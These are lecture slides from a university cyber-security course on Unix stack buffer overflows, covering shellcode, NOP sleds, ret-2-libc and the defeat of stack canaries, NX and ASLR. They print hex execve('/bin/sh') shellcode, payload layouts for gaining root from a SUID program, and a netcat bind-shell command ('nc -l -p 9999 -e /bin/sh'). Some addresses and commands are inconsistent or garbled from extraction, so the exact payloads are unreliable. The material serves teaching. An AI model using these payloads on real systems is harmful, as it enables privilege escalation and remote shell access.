Mahidol University
Master degree of
Cyber Security and Information Assurance
UNIX SECURITY
BATTLE OF
PROTECTIONS VS EXPLOITATIONS
Ammarit Thongthua
<ShellCodeNoobx Es>
�AGENDA
Introduction
Vulnerable
Unix application
Memory Space and Stack Layout
Buffer Overflow
Unix application Reverse Engineer
ShellCode
Protection vs Expliotation
Basic
Stack without protection + Demo
Bypass password protection
Exploit to get root privilege
Limited
Stack Space + Demo
StackGuard (Canary) + Demo
Non-Executable-Stack (NX) + Demo
Address
Defeat with static system library (kernel < 2.6.20 ) + Demo
ASLR
Space Layout Randomization (ASLR)
with removed Static system library
Defeat with application wrapping (kernel >= 2.6.20 ) + Demo
�VULNERABLE UNIX APPLICATION
Has permission root as user or group
SUID or SGID is set (Sting S at eXecute bit)
This
root
2 criteria provided privilege escalation to be
�VULNERABLE UNIX APPLICATION
Use vulnerable input standard function
Ex:
strcp(), gets()
They make the program can possibly
segmentation fault (buffer overflow)
�MEMORY ADDRESS AND STACK
LAYOUT
char pw[608];
�MEMORY ADDRESS AND STACK
LAYOUT
0xFFFFFFFF
Stack
Heap
DSS Segment
Data Segment
Code Segment
0x00000000
Int i = 0;
Char pw[608];
�MEMORY ADDRESS AND STACK
LAYOUT
..
0xFFFFFFFF
Previous Stacks
Stack
0x00000000
Int i = 0;
Main()
�MEMORY ADDRESS AND STACK
LAYOUT
..
0xFFFFFFFF
Previous Stacks
Stack
Int i = 0;
RP
SFP
Char pw[608];
0x00000000
Main()
checkpw()
�BUFFER OVERFLOW
The situation when the data that input to the
system is larger than the size of buffer that d
eclare to be used Ex: char pw[608];
AAAAAAAAAA....[607 of A].AAA\x00
SFP
RP
AAAAAAAAAA.[616 of A].AAAAAAAAAAAAAA\x00
SFP
SFP = 0x41414141
***RP = 0x41414141
Segmentation fault
Illegal Instruction
RP
�BUFFER OVERFLOW
AAAAAAAAAAAAA.[612 of A].AAAAAAA 0x080484c7
SFP
SFP = 0x41414141
***RP = 0x080484c7
Segmentation fault
Illegal Instruction
RP
�BUFFER OVERFLOW
�BUFFER OVERFLOW
Demo #1
Bypass password protection
�BUFFER OVERFLOW
Attacker can control return pointer to run Malicious
Machine OpCode that put to memory (Shell Code).
Insert shell code as a part of input to reduce the
complexity of exploitation
0xFBFF0544
[Malicious Machine OpCode] + [ PADDING ]
SFP
SFP = 0x41414141
***RP = 0xFBFF0544
0xFBFF0544
RP
�SHELL CODE
Shell code is the code that attacker want the
system run in order to operate the command as
attacker need (create form assembly and conv
ert to OpCode
Ex;
Open port for connection to that system with root
privilege
Add user to the system
Run shell as root privilege
Shell code is written as Hexadecimal format
�SHELL CODE
Assembly Code : execve(/bin/sh)
Op Code
31 c0
50
68 2f 2f 73
68 68 2f 62
69 6e
89
E3
50 53 89
e1 b0 0b
cd 80
Shell Code
�SHELL CODE
RP
Vulnerability program
Run as root
execve(/bin/sh)
We get /bin/sh as root
�SHELL CODE
Where can we get shell code use to make exploit. ?
Create
your own shell code (quite take time)
Use Metasploit to generate shell code
Metepreter
Search
from internet
shell-storm.org/shellcode
packetstormsecurity.com
www.exploit-db.com/exploits
�SHELL CODE
Where is the shell code start location ?
Need
to reverse engineering and debug
�EXPLOIT CODE
Exp = Shellcode + PAD + RP
0xBFFF520
612 bytes
4 bytes
[Shell Code] + [PADDING make size to 612 ]
SFP
SFP = 0x41414141
***RP = 0xBFFF520
0xBFFF520
RP
�EXPLOIT CODE
Shellcode = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
RP = \x20\xf5\xff\xbf # 0xBFFF520
Exp = scode + `python c- print A*528 ` + RP
----------------------------------------------------------------------------------------------user@host:$ python exp.py | ./vul_app
�EXPLOIT CODE
Sometime result of our exploit is crash !!!
What happen ?
[Shell Code] + [PADDING make size to 612 ]
0xBFFF520
�EXPLOIT CODE
[ Shell Code ] + [ 577 Byte of PADDING ]
0xBFFF520
[400B. Landing space] +[Shell Code] + [177 B. PADDING ]0xBFFF540
NOP (\x90) = Do nothing
�EXPLOIT CODE
Shellcode = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
RP = \x40\xf5\xff\xbf # 0xBFFF520
Exp = `python c- print \x90*400 `+ scode +`python c- print A*128
`+ RP
----------------------------------------------------------------------------------------------user@host:$ python exp.py | ./vul_app
�EXPLOIT CODE
When exploit successfully
�BASIC STACK WITHOUT PROTECTION
Demo #2
Exploit to get root privilege
�LIMITED STACK SPACE
0xFBFFxxxx
If size of buffer is limited, we need to put
some shell code some where in stack and co
ntrol RP to run shell code
[ NOP Space (NOP Sledding) ] + [S h e l l C o d e ]
AAAAAAAAAAAAA[612 of A]AAAAAAAA 0xFBFFxxxx
SFP
SFP = 0x41414141
***RP = 0xBFFFxxxx ??? (We dont know yet)
RP
�LIMITED STACK SPACE
***RP = 0xBFFFF7B0
�LIMITED STACK SPACE
Shellcode = \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
RP = \xb0\xf7\xff\xbf # 0xBFFF520
Exp =`python c- print A*612` + RP + =`python c- print \x90*400` +
scode
----------------------------------------------------------------------------------------------user@host:$ python exp.py | ./vul_app
�LIMITED STACK SPACE
When exploit successfully
�LIMITED STACK SPACE
Demo #3
Exploit to get root privilege
With Limited Stack Space
�Mahidol University
Master degree of
Cyber Security and Information Assurance
UNIX SECURITY
BATTLE OF
PROTECTIONS VS EXPLOITATIONS
(CONTINUE)
Ammarit Thongthua
<ShellCodeNoobx Es>
�LAST TIME
Introduction
Vulnerable
Unix application
Memory Space and Stack Layout
Buffer Overflow
Unix application Reverse Engineer
ShellCode
Protection vs Expliotation
Basic
Stack without protection + Demo
Bypass password protection
Exploit to get root privilege
Limited
Stack Space + Demo
�SUMMARY
Bypass
password protection
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Buffer
RP
main()
Grant()
overflow to run shellcode to get root privilege
\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Buffer
RP
overflow to run shellcode with limited Stack Space
AAAAAAAAAAAAAAAAAAAAAAAAAA
RP
\x90 \x90\x90\x90\x90\x90\x90 + [Shell Code]
�TODAY
Bypass
limited stack space by ret-2-libc
StackGuard (Canary) and Defeat
Non-Executable-Stack (NX) and Defeat
Address Space Layout Randomization (ASLR)
Defeat with static system library (kernel < 2.6.20 )
ASLR
with removed Static system library
Defeat with application wrapping (kernel >= 2.6.20 )
�BYPASS LIMITED STACK SPACE BY RET-2LIBC
Characteristic of vulnerable program
Has
set SUID, GUID
Can Overflow
Use Libc.
�BYPASS LIMITED STACK SPACE BY RET-2LIBC
Fool program to make system call with evil
command
nc
-l -p 9999 -e /bin/sh
AAAAAAAAAAAAA
SFP
system
Arg
RP
If Arg = nc -l -p 9999 -e /bin/sh and Program run as
root
So, nc l p 9999 e /bin/sh run as root
�BYPASS LIMITED STACK SPACE BY RET-2LIBC
Find location of system call function
�BYPASS LIMITED STACK SPACE BY RET-2LIBC
Create evil Argument as system global
variable
AAAAAAAAAAAAA
SFP
system
RP =
\xf0\x4e\xec\xb7
Arg
NC =
\x98\xfa\xff\xbf
�BYPASS LIMITED STACK SPACE BY RET-2LIBC
Result
�BYPASS LIMITED STACK SPACE BY RET-2-LIBC
When exploit successfully
�STACK GUARD (CANARY)
Protection mechanism place in stack (8 byte) to
detect the overflow and preventing to control RP
Need to include when we compile program
gcc
-fstack-protector code.c -o myprogram
AAAAAAAAAAAAAAAAAAAA AAAA AAAA AAAA
Canary
SFP
RP
If canary overwritten the program will be terminated
Type of Canary
NULL
canary (0x00000000)
Terminator canary (0x00000aff 0x000aff0d)
Random canary (Unpredicted 4 byte)
�STACK GUARD (CANARY) DEFEAT
For Null canary and Terminator canary can be
defeated by Canary repaired
NULL
canary only app use gets() function
AAAAAA00000000AAAA[RP] x90\x90\x90\x[Shellcode]\x0a
Terminator
canary (always 0x00000aff)
app use gets() function
app use strcpy() function and need more than 1 arg
Arg1= AAAAAAAAAA0affAAAA[RP] x90\x90\x90\x[Shellcode]00
BBBBBBBB00
CCCCCC00
Arg3=
AAAAAA00000affAAAA[RP] x90\x90\x90\x[Shellcode]
Arg2=
�STACK GUARD (CANARY) DEFEAT
EXAMPLE
Find opportunity to exploit
�STACK GUARD (CANARY) DEFEAT
EXAMPLE
Find opportunity to exploit
Canary value = 0x00000af
(It is a terminator canary ^_^)
�STACK GUARD (CANARY) DEFEAT
EXAMPLE
Run exploit
�ADDRESS SPACE LAYOUT
RANDOMIZATION (ASLR)
Technique use prevent an attacker jumping
to a particular exploited code in memory by
random the virtual address in every runtime.
�ADDRESS SPACE LAYOUT
RANDOMIZATION (ASLR)
.
\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAA
Random is 2
20
So, Possibility =1/2
20
or 0.000001
How can we increase possibility to jump to shell code ?
RP
�ADDRESS SPACE LAYOUT
RANDOMIZATION (ASLR) DEFEAT MET
HOD
If OS kernel has some static lib. Use JMP ESP
instruction in that static lib to bring RP to she
ll code
esp
INC EAX
AAAAAAAAAAAAAAAAAAAAAAA RP /x90/x90/x90/x[ shell code ]
JMP ESP ADD EBS, EBP .
�ADDRESS SPACE LAYOUT
RANDOMIZATION (ASLR) DEFEAT MET
HOD
If OS kernel has not static lib, need to write
application to call vulnerable application to li
mit random address space (App wrap up)
Check current ESP value
and Set
RP = ESP + [vul app bufer]
AAAAAAAAAAAAAAAAAAAAAAAAA
RP /x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x90/x90/x90/x90/x90
/x90/x90/x90/x90/x[ shell code ]
�ADDRESS SPACE LAYOUT
RANDOMIZATION (ASLR) DEFEAT MET
HOD
Wrap up app
�ADDRESS SPACE LAYOUT
RANDOMIZATION (ASLR) DEFEAT MET
HOD
Result
�SUMMARY
Bypass
limited stack space by ret-2-libc
StackGuard (Canary) and Defeat
Non-Executable-Stack (NX) and Defeat
Address Space Layout Randomization (ASLR)
Defeat with static system library (kernel < 2.6.20 )
ASLR
with removed Static system library
Defeat with application wrapping (kernel >= 2.6.20 )
�REFERENCE
Protecting Against Address Space Layou
Randomization (ASLR) Compromises and Ret
urn-to-Libc Attacks Using Network Intrusion D
etection Systems. David J. Day, Zheng-Xu Zh
ao, November 2011, Volume 8, Issue 4, pp 47
2-483
Cowan, C. Buffer Overflow Attacks.
StackGuard:Automatic Adaptive Detection an
d Prevention of Buffer-Overflow Attacks. 1 O
ctober 2008.
Defeating PaX ASLR protection. Durden, T.
59, s.l. :Phrack, 2002, Vol. 12.
